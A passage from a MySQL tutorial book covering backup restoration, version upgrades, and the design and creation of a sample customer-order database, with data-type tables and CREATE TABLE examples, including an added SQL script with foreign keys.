In the preceding code, make the following substitutions: 


• accountname: Enter the name of the MySQL account that you’re 
using to back up the database. 

The account that you use needs to have select privilege. If the 
account doesn’t require a password, you can leave out the entire 
password option. 

• password: Use the password for the account. 

• databasename: Replace with the name of the database that you 
want to back up. 

• path\backupfilename: Replace path with the directory in which 
you want to store the backups and use the name of the file in which you 
want to store the SQL output in place of backupfilename. 
For example, to back up the ProductCatalog database, you might use the 
command 

mysqldump --user=root ProductCatalog >ProdCatalogBackup 


Restoring Your Data 

At some point, one of your database tables might become damaged and 
unusable. It’s unusual, but it happens. For instance, a hardware problem or 
an unexpected computer shutdown can cause corrupted tables. Sometimes, 
an anomaly in the data that confuses MySQL can cause corrupt tables. In 
some cases, a corrupt table can cause your MySQL server to shut down. 

Here’s a typical error message that signals a corrupted table: 

Incorrect key file for table: 'tablename'. 

You can replace the corrupted table(s) with the data stored in a backup copy. 

However, in some cases, the database might be lost completely. For instance, 
if the computer on which your database resides breaks down and can’t be 
fixed, your current database is lost — but your data isn’t gone forever. You 
can replace the broken computer with a new computer and restore your 
database from a backup copy. 

You can replace your current database table(s) with the database you’ve 
stored in a backup copy. The backup copy contains a snapshot of the data 
as it was when the copy was made. Of course, you don’t get any of the changes 
to the database since the backup copy was made; you have to re-create 
those changes manually. 

Again, if you access MySQL through an IT department or through a web 
hosting company, you need to ask the MySQL administrator to restore your 
database from a backup. If you’re the MySQL administrator, you can restore 
it yourself. 

As we describe in Chapter 1 of this minibook, you build a database by creating 
the database and then adding tables to the database. The backup created by 
the mysqldump utility, as described in the section “Backing Up Your Database,” 
earlier in this chapter, is a file that contains all the SQL statements necessary 
to rebuild the tables, but it doesn’t contain the statements you need to 
create the database itself. 

To restore the database from the backup file, you must first edit the backup 
file (which is a text file). Then, you use the mysql client to create the 
database from the SQL statements in the backup file. 

First, you edit the backup file by following these steps: 

1. Open the backup file in a text editor. 

2. Locate the line that shows the Server Versions. 

3. If you want to rebuild an entire database, add the following statement 
below the line that you locate in Step 2: 

CREATE DATABASE IF NOT EXISTS databasename 

4. Below the line in Step 3, add a line specifying which database to add 
the tables to: 

USE databasename 

5. Check the blocks of statements that rebuild the tables. 

If you don’t want to rebuild a table, add -- (two hyphens) at the 
beginning of each line that rebuilds the table. The hyphens mark the lines as 
comments. 

6. Check the insert lines for each table. 

If you don’t want to add data to any tables, comment out the lines that 
INSERT the data. 

7. Save the edited backup file. 


After the backup file contains the statements that you want to use to rebuild 
your database or table(s), you can use the mysql client to execute the SQL 
statements in the backup file. Just follow these steps: 



1. From a command line prompt, change to the bin subdirectory in the 
directory where MySQL is installed. 

In Windows, you open a command prompt window to use the mysql 
client, as described in Chapter 1 of this minibook. 

Type a cd command to change to the correct directory. For instance, 
you might type cd /usr/local/mysql/bin or 
cd c:\Program Files\MySQL\MySQL Server 5.0\bin. 

2. Type this command (which sends the SQL queries in the backup file): 

mysql -u accountname -p < path/backupfilename 

You replace accountname with an account that has create privilege. If 
the account doesn’t require a password, leave out the -p. If you use the 
-p, you’re asked for the password. Use the entire path and filename for 
the backup file. For instance, you could use this command to restore the 
ProductCatalog database: 

mysql -u root -p < "c:\Program Files\MySQL\MySQL Server 5.0\bin\bak\ProductCatalog.bak" 
The tables might take a short time to restore. Wait for the command to 
finish. If a problem occurs, an error message appears. If no problems occur, 
you see no output. When the command is finished, the prompt appears. 

Your database is now restored with all the data that was in it at the time the 
copy was made. If the data has changed since the copy was made, you lose 
those changes. For instance, if more data was added after the backup copy 
was made, the new data isn’t restored. If you know the changes that were 
made after creating the backup, you can make them manually in the restored 
database. 


Upgrading MySQL 

New versions of MySQL are released periodically, and you can upgrade from 
one version of MySQL to a newer version. You can find upgrading 
information in the MySQL manual at 
http://dev.mysql.com/doc/refman/5.5/en/upgrading.html. 


However, there are special considerations when you upgrade. As a precaution, 
back up your current databases, including the grant tables in the mysql 
database, before upgrading. 



MySQL recommends that you don’t skip versions. If you want to upgrade 
from one version to a version more than one version newer, such as from 
MySQL 4.0 to MySQL 5.0, you should upgrade to the next version first. After 
that version is working correctly, you can upgrade to the next version, and 
so on. In other words, upgrade from 4.0 to 4.1, then from 4.1 to 5.0. 


Occasionally, incompatible changes are introduced in new versions of MySQL. 
Some releases introduce changes to the structure of the grant tables. For 
instance, MySQL 4.1 changed the method of encrypting passwords, requiring 
a longer password field in the grant tables. 


After upgrading to the newer version, you should run the mysql_upgrade 
script. It repairs your files and upgrades the system tables, if needed. In 
versions prior to MySQL version 5.0.19, the mysql_upgrade script doesn’t run 
on Windows; it runs only on Unix. On Windows, you can run a script called 
mysql_fix_privilege_tables with MySQL versions prior to 5.0.19. The 
script upgrades the system tables but doesn’t perform the complete table 
check and repair that mysql_upgrade performs. 
Chapter 3: Designing and Building a Database 


In This Chapter 

Planning your database 
Designing a sample database 
Constructing your database 
Restructuring your database 


The first step in creating a database is to design it. You design a database 
before you ever put finger to keyboard to create that database. Planning 
is perhaps the most important step. It’s very painful to discover after you 
build the database and put it in service that it doesn’t contain all the data or 
provide the relationships between data that you need, so in this chapter we 
give you some tips for designing a database that will work well for you. 

After completing your database design, you’re ready to build that database, 
and we tell you how to do that too, later in the chapter. You create the 
database and its tables according to the design you developed. When it’s built, 
you have a useful, empty database, waiting for you to fill it with data. You 
can then read about adding and retrieving data in Chapter 4 of this minibook. 


Designing a Database 

Designing the database includes identifying the data that you need and 
organizing the data in the way that the database software requires. As you plan 
your database design, you’ll also need to decide on a primary key for each 
table and how tables relate to one another. You should also consider what 
types of data you will store in your database. 

Choosing the data 

To design a database, you first must identify what information belongs in it. 
The database must contain the data needed for the website to perform its 
purpose. 
Here are a few examples: 

♦ An online catalog needs a database containing product information. 

♦ An online order application needs a database that can hold customer 
information and order information. 

♦ A travel website needs a database with information on destinations, 
reservations, fares, schedules, and so on. 

In many cases, your application might include a task that collects 
information from the user. For instance, customers who buy products from a 
website must provide their address, phone number, credit card information, and 
other data in order to complete the order. The information must be saved at 
least until the order is filled. Often, the website retains the customer 
information to facilitate future orders so the customer doesn’t need to retype 
the information when placing the next order. The information also provides 
marketing opportunities to the business operating the website, such as sending 
marketing offers or newsletters to customers. 

A customer database might collect the following customer information: 

♦ Name 

♦ Address 

♦ Phone number 

♦ Fax number 

♦ E-mail address 



You have to balance your urge to collect all the potentially useful 
information you can think of against your users’ reluctance to give out personal 
information — as well as their avoidance of forms that look too 
time-consuming. 


One compromise is to ask for some optional information. Users who don’t 
mind can enter that information, but users who object can leave that portion 
of the form blank. You can also offer an incentive: The longer the form, the 
stronger the incentive you need to motivate the user to fill out the form. 
Here’s an example: A user might be willing to fill out a short form to enter a 
sweepstakes that offers two sneak-preview movie tickets as a prize, but if the 
form is long and complicated, the prize needs to be more valuable, such as a 
chance to win a trip to Hollywood. 



Take the time to develop a comprehensive list of the information you need 
to store in your database. Although you can change and add information to 
your database after you develop it, including the information from the 
beginning is easier, and you might be able to avoid the extra work of changing 
the database later. Also, if you add information to the database later — after 
that database is in use — the first users in the database have incomplete 
information. For example, if you change your form so that it now asks for the 
user’s age, you don’t have the age for the people who already filled out the 
form and are already in the database. 

Organizing the data 

MySQL is a Relational Database Management System (RDBMS), which means 
the data is organized into tables. (See Chapter 1 in this minibook for more on 
how MySQL works.) 

RDBMS tables are organized like other tables that you’re used to — in rows 
and columns, as shown in the following table. 

Column 1 Column 2 Column 3 Column 4 


Row 1 
Row 2 
Row 3 
Row 4 


The individual cell in which a particular row and column intersect is called 
a field. 

The focus of each table is an object (a thing) that you want to store informa¬ 
tion about. Here are some examples of objects: 


♦ Customers 
♦ Products 
♦ Companies 
♦ Animals 
♦ Cities 
♦ Rooms 
♦ Books 
♦ Computers 
♦ Shapes 
♦ Documents 
♦ Projects 
♦ Weeks 


You create a table for each object. The table name should clearly identify 
the objects that it contains with a descriptive word or term, based on the 
following guidelines: 

♦ The name must be a character string, containing letters, numbers, 
underscores, or dollar signs, but no spaces. 

♦ It’s customary to name the table in the singular form. Thus, a name for a 
table of customers might be Customer, and a table containing customer 
orders might be named CustomerOrder. 
♦ The difference between uppercase and lowercase is significant on Linux
and Unix, but not on Windows. CustomerOrder and Customerorder 
are the same to Windows — but not to Linux or Unix. That said, it’s best 
to be sensitive to case in the event that you ever need to change hosting 
platforms. 

In database talk, an object is an entity, and an entity has attributes. In the
table, each row represents an entity, and the columns contain the attributes
of each entity. For example, in a table of customers, each row contains information
for a single customer. Some of the attributes contained in the columns
might include first name, last name, phone number, and age.

Follow these steps to decide how to organize your data into tables: 

1. Name your database.

Assign a name to the database for your application. For instance, you 
might name a database containing information about households in a 
neighborhood HouseholdDirectory. 

2. Identify the objects. 

Look at the list of information that you want to store in the database (as 
discussed in the preceding section). Analyze your list and identify the 
objects. For instance, the HouseholdDirectory database might need 
to store the following: 

• Name of each family member 

• Address of the house 

• Phone number 

• Age of each household member 

• Favorite breakfast cereal of each household member 

When you analyze this list carefully, you realize that you’re storing information
about two objects: the household and the household members.
The address and phone number are for the household, in general, but the
name, age, and favorite cereal are for each particular household member.

3. Define and name a table for each object.

For instance, the HouseholdDirectory database needs a table called 
Household and a table called HouseholdMember. 

4. Identify the attributes for each object.

Analyze your information list and identify the attributes you need to
store for each object. Break the information to be stored into its smallest
reasonable pieces. For example, when storing the name of a person
in a table, you can break the name into first name and last name. Doing
this enables you to sort by the last name, which would be more difficult
if you stored the first and last name together. You can even break down
the name into first name, middle name, and last name, although not
many applications need to use the middle name separately.

5. Define and name columns for each separate attribute that you identify 
in Step 4. 

Give each column a name that clearly identifies the information in that
column. The column names should be one word, with no spaces. For
example, you might have columns named firstName and lastName or
first_name and last_name.

MySQL and SQL reserve some words for their own use, and you can’t
use those words as column names. The words are currently used in
SQL statements or are reserved for future use. You can’t use ADD, ALL,
AND, CREATE, DROP, GROUP, ORDER, RETURN, SELECT, SET, TABLE, USE,
WHERE, and many, many more as column names. For a complete list of
reserved words, see the online MySQL manual at
http://dev.mysql.com/doc/refman/5.5/en/reserved-words.html.

6. Identify the primary key. 

Each row in a table needs a unique identifier. No two rows in a table 
should be exactly the same. When you design your table, you decide 
which column holds the unique identifier, called the primary key. 

The primary key can be more than one column combined. In many
cases, your object attributes don’t have a unique identifier. For example,
a customer table might not have a unique identifier because two customers
can have the same name. When you don’t have a unique identifier
column, you need to add a column specifically to be the primary key.
Frequently, a column with a sequence number is used for this purpose.
For example, in Table 3-1, the primary key is the cust_id field because
each customer has a unique ID number.


Table 3-1  A Sample of Data from the Customer Table

cust_id    first_name    last_name    phone
27895      John          Smith        555-5555
44555      Joe           Lopez        555-5553
23695      Judy          Chang        555-5552
29991      Jubal         Tudor        555-5556
12345      Joan          Smythe       555-5559


7. Define the defaults. 

You can define a default that MySQL assigns to a field when no data is 
entered into the field. You don’t need a default, but one can often be 
useful. For example, if your application stores an address that includes 
a country, you can specify U.S. as the default. If the user doesn’t type a
country, MySQL enters U.S.

8. Identify columns that require data. 

You can specify that certain columns aren’t allowed to be empty (also 
called null). For instance, the column containing your primary key 
can’t be empty. If no value is stored in the primary key column, MySQL 
doesn’t create the row and returns an error message. The value can be 
a blank space or an empty string (for example, ""), but some value must 
be stored in the column. You can set other columns, in addition to the 
primary key, to require data. 



Well-designed databases store each piece of information in only one place. 
Storing it in more than one place is inefficient and creates problems if you 
need to change information. If you change information in one place but forget 
to change it in another place, your database can have serious problems. 



If you find that you’re storing the same data in several rows, you probably 
need to reorganize your tables. For example, suppose you’re storing data 
about books, including the publisher’s address. When you enter the data, you 
realize that you’re entering the same publisher’s address in many rows. A 
more efficient way to store this data would be to store the book information in 
one table and the book publisher information in another table. You can define 
two tables: Book and BookPublisher. In the Book table, you would have 
the columns title, author, pub_date, and price. In the BookPublisher 
table, you would have columns such as name, streetAddress, and city. 


Creating relationships between tables

Some tables in a database are related. Most often, a row in one table is related 
to several rows in another table. You need a column to connect the related 
rows in different tables. In many cases, you include a column in one table to 
hold data that matches data in the primary key column of another table. 

A common application that needs a database with two related tables is a 
customer order application. For example, one table contains the customer 
information, such as name, address, and phone number. Each customer can 
have from zero to many orders. You could store the order information in the 
table with the customer information, but a new row would be created each 
time the customer placed an order, and each new row would contain all the 
customer’s information. You can much more efficiently store the orders 
in a separate table, named perhaps CustomerOrder. (You can’t name the 
table just Order because that’s a reserved word.) In the CustomerOrder 
table, you include a column that contains the primary key from a row in the 
Customer table so the order is related to the correct row of the Customer 
table. The relationship is shown in Table 3-1 (earlier in the chapter) and 
Table 3-2. 

The Customer table in this example looks like Table 3-1. Each customer has
a unique cust_id. The related CustomerOrder table is shown in Table 3-2. It
has the same cust_id column that appears in the Customer table. Through
this column, the order information in the CustomerOrder table is connected
to the related customer’s name and phone number in the Customer table.


Table 3-2  Sample Data from the CustomerOrder Table

order_no    cust_id    item_name    cost
87-222      27895      T-Shirt      20.00
87-223      27895      Shoes        40.00
87-224      12345      Jeans        35.50
87-225      34521      Jeans        35.50
87-226      27895      Hat          15.00


In this example, the columns that relate the Customer table and the 
CustomerOrder table have the same name. They could have different 
names, as long as the columns contain the same data. 

Storing different types of data

MySQL stores information in different formats, based on the type of information
that you tell MySQL to expect. MySQL allows different types of data to
be used in different ways. The main types of data are character, numerical,
and date and time data. We describe those and other data types and then
tell you how to indicate which data type you’re using in each column.

Character data 

The most common type of data is character data (data that’s stored as strings
of characters), and it can be manipulated only in strings. Most of the information
that you store is character data — for example, customer name, address,
phone number, and pet description. You can move and print character data.
Two character strings can be put together (concatenated), a substring can be
selected from a longer string, and one string can be substituted for another.

Character data can be stored in a fixed-length or variable-length format: 

♦ Fixed-length format: In this format, MySQL reserves a fixed space for
the data. If the data is longer than the fixed length, only the characters
that fit are stored — the remaining characters on the end aren’t stored.
If the string is shorter than the fixed length, the extra spaces are left
empty and wasted.

♦ Variable-length format: In this format, MySQL stores the string in a field
that’s the same length as the string. You specify a string length, but if
the string itself is shorter than the specified length, MySQL uses only the
space required, instead of leaving the extra space empty. If the string is
longer than the space specified, the extra characters aren’t stored.

If a character string length varies only a little, use the fixed-length format.
For example, a length of ten works for all ZIP codes, including those with the
ZIP+4 number. If the ZIP code doesn’t include the ZIP+4 number, only five
spaces are left empty. However, if your character string can vary more than
a few characters, use a variable-length format to save space. For example,
your pet description might be small bat, or it might run to several lines of
description. By storing this description in a variable-length format, you only
use the necessary space.

Numerical data

Another common type of data is numerical data — data that’s stored as
a number. You can store decimal numbers (for example, 10.5, 2.34567,
23456.7) as well as integers (for example, 1, 2, 248). When you store data as a
number, you can use that data in numerical operations, such as adding, subtracting,
and squaring. If you don’t plan to use data for numerical operations,
however, you should store it as a character string because the programmer
will be using it as a character string. No conversion is required.

MySQL stores positive and negative numbers, but you can tell MySQL to
store only positive numbers. If your data is never negative, store the data as
unsigned (without a + or - sign before the number). For example, a city population
or the number of pages in a document can never be negative.

MySQL provides a specific type of numeric column called an auto-increment
column. This type of column is automatically filled with a sequential number
if no specific number is provided. For example, when a table row is added
with 5 in the auto-increment column, the next row is automatically assigned
6 in that column unless a different number is specified. You might find auto-increment
columns useful when you need unique numbers, such as a product
number or an order number.

Date and time data 

A third common type of data is date and time data. Data stored as a date can 
be displayed in a variety of date formats. You can use that data to determine 
the length of time between two dates or two times — or between a specific 
date or time and some arbitrary date or time. 

Enumeration data 

Sometimes, data can have only a limited number of values. For example, the 
only possible values for a column might be yes or no. MySQL provides a 
data type called enumeration for use with this type of data. You tell MySQL 
what values can be stored in the column (for example, yes and no), and 
MySQL doesn’t store any other values in that column. 

MySQL data type names

When you create a database, you tell MySQL what kind of data to expect in a 
particular column by using the MySQL names for data types. Table 3-3 shows 
the MySQL data types used most often in web database applications. 


Table 3-3  MySQL Data Types

MySQL Data Type          Description

CHAR(length)             Fixed-length character string.

VARCHAR(length)          Variable-length character string. The longest string
                         that can be stored is length, which must be
                         between 1 and 255.

TEXT                     Variable-length character string with a maximum
                         length of 64K of text.

INT(length)              Integer with a range from -2147483648 to
                         +2147483647. The number that can be displayed is
                         limited by length. For example, if length is 4,
                         only numbers from -999 to 9999 can be displayed,
                         even though higher numbers are stored.

INT(length) UNSIGNED     Integer with a range from 0 to 4294967295.
                         length is the size of the number that can be
                         displayed. For example, if length is 4, only numbers
                         from 0 to 9999 can be displayed, even though
                         higher numbers are stored.

BIGINT                   A large integer. The signed range is
                         -9223372036854775808 to 9223372036854775807.
                         The unsigned range is 0 to 18446744073709551615.

DECIMAL(length,dec)      Decimal number in which length is the number
                         of characters that can be used to display the
                         number, including decimal points, signs, and exponents,
                         and dec is the maximum number of decimal
                         places allowed. For example, 12.34 has a length
                         of 5 and a dec of 2.

DATE                     Date value with year, month, and date. Displays the
                         value as YYYY-MM-DD (for example, 2013-04-03
                         for April 3, 2013).

TIME                     Time value with hour, minute, and second. Displays
                         as HH:MM:SS.

DATETIME                 Date and time are stored together. Displays as
                         YYYY-MM-DD HH:MM:SS.

ENUM("val1","val2"...)   Only the values listed can be stored. A maximum of
                         65,535 values can be listed.

SERIAL                   A shortcut name for BIGINT UNSIGNED NOT
                         NULL AUTO_INCREMENT.


MySQL allows many data types other than those listed in Table 3-3, but you
probably need those other data types less frequently. For a description of
all the available data types, see the MySQL online manual at
http://dev.mysql.com/doc/refman/5.6/en/data-types.html.


Designing a Sample Database

In this section, we design a sample database to contain customer order 
information. We use this database later in this chapter and in Chapter 4 of 
this minibook to show how to build and use a database. 

Create the following list of information that you want to store for each 
customer: 

♦ Name 

♦ Address 

♦ Phone number

♦ Fax number

♦ E-mail address 

In addition, you need to collect information about which products the customers
order. For each order, you need to collect the following information:

♦ Date the order is placed 

♦ Product information for each item in the order 

In this example, the product is T-shirts. Therefore, you need the following
information for each item:

• Number that identifies the specific product (such as a catalog number) 

• Size 

• Price 

• Color 

You design the Customer database by following the steps presented in the
“Organizing the data” section, earlier in this chapter, with this information
in mind:

1. Name your database.

The database for the order information is named CustomerOrderInformation.

2. Identify the objects. 

The information list is 

• Customer name 

• Customer address 

• Customer phone number 

• Customer fax number 

• Customer e-mail address 

• Order date 

• Number that identifies the specific product (such as a catalog 
number) 

• Size 

• Color 

• Price 

The first five information items pertain to customers, so one object is
Customer. The order date information pertains to the total order, so
another object is CustomerOrder. The remaining four pieces of information
pertain to each individual item in the order, so the remaining
object is OrderItem.

3. Define and name a table for each object.

The CustomerOrderInformation database needs the following tables:

• Customer

• CustomerOrder

• OrderItem

4. Identify the attributes for each object. 

Look at the information list in detail: 

• Customer ID: One attribute (a unique ID for each customer). 

• Customer name: Two attributes (first name and last name). 

• Customer address: Four attributes (street address, city, state, and 
ZIP code). 

• Customer phone number: One attribute.

• Customer fax number: One attribute. 

• Customer e-mail address: One attribute. 

• Order number: One attribute (a unique ID for each order). 

• Order date: One attribute. 

• Number that identifies the specific product (such as a catalog 
number): One attribute. 

• Size: One attribute. 

• Color: One attribute. 

• Price: One attribute. 

5. Define and name the columns. 

The Customer table has one row for each customer. The columns for 
the Customer table are 

• customerID

• firstName 

• lastName 

• street 

• city 

• state 

• zip 

• email 

• phone 

The CustomerOrder table has one row for each order with the following
columns:

• CustomerID: This column links this table to the Customer table.
This value is unique in the Customer table, but it’s not unique in this
table.

• orderID

• orderDate

The OrderItem table has one row for each item in an order that
includes the following columns:

• catalogID

• orderID: This column links this table to the CustomerOrder table.
This value is unique in the CustomerOrder table, but it’s not unique
in this table.

• size

• color

• price

6. Identify the primary key.

The primary key for the Customer table is customerID. Therefore,
customerID must be unique. The primary key for the CustomerOrder
table is orderID. The primary key for the OrderItem table is orderID
and catalogID together.

7. Define the defaults. 

No defaults are defined for any table. 

8. Identify columns with required data. 

The following columns should never be allowed to be empty: 

• customerID

• orderID

• catalogID

These columns are the primary-key columns. Never allow a row without 
these values in the tables. 

9. Decide on the data type for storing each attribute.

• Numeric: CustomerID and orderID are numeric data types.

• Date: OrderDate is a date data type.

• Character: All remaining fields are character data types. 

You probably spent substantial time making the design decisions for your
database. At this point, the decisions are firmly fixed in your mind. You
probably don’t think that you can forget them. But suppose that a crisis
intervenes; you don’t get back to this project for two months. You have to
analyze your data and make all the design decisions again if you didn’t write
down the decisions you originally made.

Write them down now. 

Document the organization of the tables, the column names, and all other
design decisions. Your document should describe each table in table format,
with a row for each column and a column for each design decision. For example,
your columns would be column name, data type, and description. The
three tables in the sample design for the database named
CustomerOrderInformation are documented in Table 3-4, Table 3-5, and Table 3-6.

Table 3-4  Customer Table

Column Name    Data Type      Description
customerID     SERIAL         Unique ID for customer (primary key)
lastName       VARCHAR(50)    Customer's last name
firstName      VARCHAR(40)    Customer's first name
street         VARCHAR(50)    Customer's street address
city           VARCHAR(50)    Customer's city
state          CHAR(2)        Customer's state
zip            CHAR(10)       Customer's ZIP code
email          VARCHAR(50)    Customer's e-mail address
fax            CHAR(15)       Customer's fax number
phone          CHAR(15)       Customer's phone number


Table 3-5  CustomerOrder Table

Variable Name  Type           Description
orderID        SERIAL         Login name specified by user (primary key)
customerID     BIGINT         Customer ID of the customer who placed the order
orderDate      DATETIME       Date and time that order was placed


Table 3-6  OrderItem Table

Variable Name  Type           Description
catalogID      VARCHAR(15)    Catalog number of the item (primary key 1)
orderID        BIGINT         Order ID of the order that includes this item (primary key 2)
color          VARCHAR(10)    Color of the item
size           VARCHAR(10)    Size of the item
price          DECIMAL(9,2)   Price of the item

After you’ve carefully planned your database as described earlier in the
chapter, you can then get to work building the database. A database has two
parts: a structure to hold the data and the data itself. In the following sections,
we explain how to create the database structure. First, you create an empty
database with no structure at all, and then you add tables to it.

When you create a database, you create a new subdirectory in your data
directory with the database name that you assign. Files are then added to
this subdirectory later, when you add tables to the database. The data directory
is usually a subdirectory in the directory where MySQL is installed. You
can set up a different directory as the data directory by adding a statement
in the MySQL configuration file, my.cnf, in the following format:

datadir=c:/xampp/mysql/data 

You can add this statement to the configuration file or change the statement 
that’s already there. 

You can create the database by using SQL statements, as described in 
Chapter 1 of this minibook. To create a database, you must use a MySQL 
account that has permission to create, alter, and drop databases and tables, 
and we tell you how to do that here. See Chapter 2 in this minibook for more 
on MySQL accounts. 


Creating a new database


Your first step in creating a new database is to create an empty database, 
giving it a name. Your database name can be up to 64 characters long. You 
can use most letters, numbers, and punctuation, with a few exceptions. In
general, you can’t use characters that are illegal in directory names for your 
operating system (see your operating system documentation to find out 
what those characters are). Don’t use a space at the end of the name. Don’t 
use a forward slash (/) or a backward slash (\) in the database name (or in 
table names, either). You can use quotes in the database name, but it isn’t 
wise to do so. 

To create a new, empty database, use the following SQL statement: 

CREATE DATABASE databasename 

In this statement, replace databasename with the name that you give your 
database. For instance, to create the sample database designed in this
chapter, use the following SQL statement: 


CREATE DATABASE CustomerOrderInformation 

Some web hosting companies don’t allow you to create a new database. The
host gives you a specified number of databases to use with MySQL, and you
can create tables in only the specified database(s). You can try requesting
an additional database, but you need a good reason. MySQL and PHP don’t
care that all your tables are in one database, rather than organized into databases
with meaningful names. Humans can just keep track of projects more
easily when those projects are organized.


If a database with the name you specify already exists, an error message is 
returned. You can avoid this error message by using an IF phrase in your
statement, as follows: 


CREATE DATABASE IF NOT EXISTS CustomerOrderInformation 


With this statement, the database is created if it doesn’t exist, but the statement
doesn’t fail if the database already exists. It just doesn’t create the new
database.


To see for yourself that a database was in fact created, use the SHOW
DATABASES SQL query.

After you create an empty database, you can add tables to it. (Check out the 
section “Adding tables and specifying a primary key,” later in this chapter.) 


Creating and deleting a database 

You can delete any database, as long as you’re using a MySQL account with 
the DROP privilege. When you drop a database, all the tables and data in the 
database are dropped, as well. 

You can remove a database with the following SQL statement: 



DROP DATABASE databasename 

Use DROP carefully because it’s irreversible. After you drop a database, that 
database is gone forever. And any data that was in it is gone, as well. 

If the database doesn’t exist, an error message is returned. You can prevent 
an error message with the following statement: 


DROP DATABASE IF EXISTS databasename 


This statement drops the database if that database exists. If it doesn’t exist, 
no error occurs. The statement just ends quietly. 

Adding tables and specifying a primary key

You can add tables to any database, whether it’s a new, empty database that
you just created or an existing database that already has tables and data in
it. The rules for allowable table names are explained in the “Organizing the
data” section, earlier in this chapter. When you create a table in a database,
a file named tablename.frm is added to the database directory.

When you create a table, you include the table definition. You define each 
column — giving it a name, assigning it a data type, and specifying any other 
definitions required. Here are some definitions often specified for columns: 

♦ NOT NULL: This column must have a value; it can’t be empty.

♦ DEFAULT value: This value is stored in the column when the row is
created if no other value is given for the column.

♦ AUTO_INCREMENT: This definition creates a sequence number. As each
row is added, the value of this column increases by one integer from the
last row entered. You can override the auto number by assigning a specific
value to the column.

♦ UNSIGNED: This definition indicates that the values for this numeric field
will never be negative numbers.

You also specify the unique identifier for each row — the primary key. A 
table must have a field or a combination of fields that’s different for each 
row. No two rows can have the same primary key. If you attempt to add 
a row with the same primary key as a row already in the table, you get an 
error message, and the row isn’t added. 

Occasionally, you might want to create a table that has the same structure 
as an existing table. You can create a table that’s an empty copy. 

You can use the CREATE statement to add tables to a database. The statement
begins with the CREATE TABLE statement, as follows:

CREATE TABLE tablename 

Then, you add a list of column names with definitions. Separate the information
for each column from the information for the following column by a
comma. Enclose the entire list in parentheses. Follow each column name by
its data type and any other definitions required.

The last item in a CREATE TABLE statement indicates which column or
combination of columns is the primary key. You specify the primary key by
using the following format:

PRIMARY KEY(columnname)

Enclose the columnname in parentheses. If you’re using a combination of
columns as the primary key, include all the column names in the parentheses,
separated by commas. For instance, you could designate the primary
key as PRIMARY KEY(columnname1,columnname2).

A complete CREATE TABLE statement has the following format:

CREATE TABLE tablename (
   columnname datatype definition1 definition2,
   columnname datatype definition1 definition2,
   PRIMARY KEY(columnname) )

Listing 3-1 shows the CREATE TABLE statement used to create the
Customer table of the CustomerOrderInformation database. You could
enter this statement on a single line if you wanted to. MySQL doesn’t care 
how many lines you use. The format shown in Listing 3-1 simply makes the 
statement easier for you to read. This human-friendly format also helps you 
spot typos. 


Listing 3-1: An SQL Statement for Creating a Table 


CREATE TABLE Customer (
   CustomerID   SERIAL,
   lastName     VARCHAR(50),
   firstName    VARCHAR(40),
   street       VARCHAR(50),
   city         VARCHAR(50),
   state        CHAR(2),
   zip          CHAR(10),
   email        VARCHAR(50),
   phone        CHAR(15),
   fax          CHAR(15),
   PRIMARY KEY(customerID) );


Note that the list of column names in Listing 3-1 is enclosed in parentheses 
(one on the first line and one on the last line), and a comma follows each 
column definition. 
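
The other two tables of the sample design (Tables 3-5 and 3-6), written the same way as Listing 3-1 and including the two-column primary key. This is an added example, not one of the book's listings: the SchemaDemo database, the sample rows, the FOREIGN KEY clauses, the NOT NULL definitions, ENGINE=InnoDB and the UNSIGNED on the linking columns are assumptions made here (a linking column has to match the SERIAL column it points to, which is BIGINT UNSIGNED).

```sql
-- Added example, not from the book. SchemaDemo is a constructed scratch
-- database so the script can be rerun without touching real data.
CREATE DATABASE IF NOT EXISTS SchemaDemo;
USE SchemaDemo;
DROP TABLE IF EXISTS OrderItem, CustomerOrder, Customer;

-- Customer table as in Listing 3-1 (engine clause added here).
CREATE TABLE Customer (
   customerID   SERIAL,
   lastName     VARCHAR(50),
   firstName    VARCHAR(40),
   street       VARCHAR(50),
   city         VARCHAR(50),
   state        CHAR(2),
   zip          CHAR(10),
   email        VARCHAR(50),
   phone        CHAR(15),
   fax          CHAR(15),
   PRIMARY KEY(customerID)
) ENGINE=InnoDB;

-- One row per order. customerID is the linking column: it is unique in
-- Customer but may repeat here. The FOREIGN KEY (an assumption added to
-- the design) makes MySQL refuse an order for a customer that does not exist.
CREATE TABLE CustomerOrder (
   orderID      SERIAL,
   customerID   BIGINT UNSIGNED NOT NULL,
   orderDate    DATETIME NOT NULL,
   PRIMARY KEY(orderID),
   FOREIGN KEY (customerID) REFERENCES Customer(customerID)
) ENGINE=InnoDB;

-- One row per item in an order. The primary key is orderID and catalogID
-- together, so the same catalog item can appear in many orders but only
-- once within a single order.
CREATE TABLE OrderItem (
   catalogID    VARCHAR(15) NOT NULL,
   orderID      BIGINT UNSIGNED NOT NULL,
   color        VARCHAR(10),
   size         VARCHAR(10),
   price        DECIMAL(9,2),
   PRIMARY KEY(orderID, catalogID),
   FOREIGN KEY (orderID) REFERENCES CustomerOrder(orderID)
) ENGINE=InnoDB;

-- Constructed sample rows.
INSERT INTO Customer (customerID, firstName, lastName, phone) VALUES
   (27895, 'John', 'Smith',  '555-5555'),
   (12345, 'Joan', 'Smythe', '555-5559');

INSERT INTO CustomerOrder (orderID, customerID, orderDate) VALUES
   (1, 27895, '2013-04-03 10:15:00'),
   (2, 12345, '2013-04-03 11:30:00');

INSERT INTO OrderItem (catalogID, orderID, color, size, price) VALUES
   ('TS-100', 1, 'blue',  'L', 20.00),
   ('TS-200', 1, 'white', 'M', 15.00),
   ('TS-100', 2, 'red',   'S', 20.00);

-- Follow the linking columns from each item back to the customer.
SELECT c.firstName, c.lastName, o.orderID, o.orderDate, i.catalogID, i.price
FROM Customer AS c
JOIN CustomerOrder AS o ON o.customerID = c.customerID
JOIN OrderItem AS i ON i.orderID = o.orderID
ORDER BY o.orderID, i.catalogID;

-- Last on purpose: customer 99999 does not exist, so the foreign key
-- rejects this order instead of storing a row that points nowhere.
INSERT INTO CustomerOrder (customerID, orderDate) VALUES (99999, NOW());
```

Run it with an account that may create and drop tables in the scratch database; the final INSERT is expected to fail.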



Remember not to use any MySQL reserved words for column names, as we 
discuss in the “Organizing the data” section, earlier in this chapter. If you
use a reserved word for a column name, MySQL gives you an error message 
that looks like this: 


You have an error in your SQL syntax near 'order var(20))' at line 1








This error message shows the column definition that it didn’t like and the 
line where it found the offending definition. However, the message doesn’t 
tell you much about what the problem actually is. The error in your 
SQL syntax that it refers to is the use of the MySQL reserved word order 
as a column name. 

If you attempt to create a table that already exists, you receive an error message.
You can prevent this error message appearing by using the following
CREATE statement:

CREATE TABLE IF NOT EXISTS tablename

If the table doesn’t exist, the statement creates it. If the table already exists, 
